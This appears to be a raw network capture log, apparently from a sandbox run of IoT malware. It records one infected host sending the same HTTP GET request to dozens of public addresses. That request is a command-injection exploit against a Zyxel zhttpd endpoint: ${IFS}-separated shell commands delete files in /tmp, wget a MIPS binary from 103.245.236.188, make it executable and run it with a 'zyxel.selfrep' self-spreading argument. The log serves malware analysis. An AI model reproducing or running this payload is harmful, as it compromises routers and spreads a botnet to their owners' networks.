                                                Jan 12, 2024 18:24:21.494847059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                770192.168.2.135586642.223.170.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494848013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                771192.168.2.1354038130.42.183.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494893074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                772192.168.2.133827413.12.48.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494957924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                773192.168.2.135169869.253.118.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495022058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                774192.168.2.1346266186.221.235.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495083094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                775192.168.2.1355328163.96.239.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495136023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                776192.168.2.134715884.64.18.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495163918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                777192.168.2.1352864152.243.236.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495233059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                778192.168.2.1346180124.205.164.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495299101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                779192.168.2.1348066220.152.54.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495347977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                780192.168.2.1357906148.48.200.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495405912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                781192.168.2.1347360173.12.27.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495450020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                782192.168.2.1346366140.169.124.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495527029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                783192.168.2.133493252.45.130.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495583057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                784192.168.2.1352870125.80.90.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495615959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                785192.168.2.1357182192.85.17.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495687008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                786192.168.2.1356022115.102.98.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495735884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                787192.168.2.135740245.111.117.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495794058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                788192.168.2.1357040145.232.141.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495842934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                789192.168.2.1350066156.179.233.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495909929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                790192.168.2.1336666137.219.40.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.495975971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                791192.168.2.134507244.118.204.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496016026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                792192.168.2.135246873.118.12.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496062994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                793192.168.2.1355898140.197.79.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496117115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                794192.168.2.135435841.242.110.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496181965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                795192.168.2.133868042.79.108.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496227026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                796192.168.2.1337006219.193.46.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496269941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                797192.168.2.13384922.170.30.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496320963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                798192.168.2.135415857.224.144.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496365070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                799192.168.2.1356260135.90.65.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496436119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                800192.168.2.1347024183.45.79.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496503115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                801192.168.2.1344234134.78.71.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496553898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                802192.168.2.1347028187.243.143.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496608019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                803192.168.2.134502670.240.63.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496651888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                804192.168.2.135238086.4.169.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496684074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                805192.168.2.1355670158.27.133.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496722937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                806192.168.2.1339548121.56.163.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496793985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                807192.168.2.1355660204.4.8.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496869087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                808192.168.2.1359750100.22.249.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496908903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                809192.168.2.1353746190.11.245.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.496984959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                810192.168.2.1341086203.12.22.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497021914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                811192.168.2.134750488.211.110.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497087002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                812192.168.2.135033860.221.235.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497139931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                813192.168.2.1355110191.206.198.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497190952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                814192.168.2.1335766176.100.70.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497242928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                815192.168.2.1354800143.29.53.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497302055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                816192.168.2.1350060216.106.255.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497364998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                817192.168.2.133956659.242.94.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497390032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                818192.168.2.1352820143.192.107.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497435093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                819192.168.2.1357776105.207.128.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497500896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                820192.168.2.136085876.143.174.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497545004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                821192.168.2.1347944200.121.22.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497597933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                822192.168.2.13373425.185.244.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497642994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                823192.168.2.1343478173.189.88.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497699022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                824192.168.2.133856851.110.103.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497749090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                825192.168.2.1360922173.179.240.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497800112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                826192.168.2.134022093.236.30.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497836113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                827192.168.2.13343122.118.58.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497909069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                828192.168.2.135318817.199.147.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.497967958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                829192.168.2.1355232121.22.54.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498034954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                830192.168.2.1336538193.212.84.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498080969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                831192.168.2.1353448189.102.111.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.498145103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                832192.168.2.134608082.5.126.0443
                                                TimestampBytes transferredDirectionData
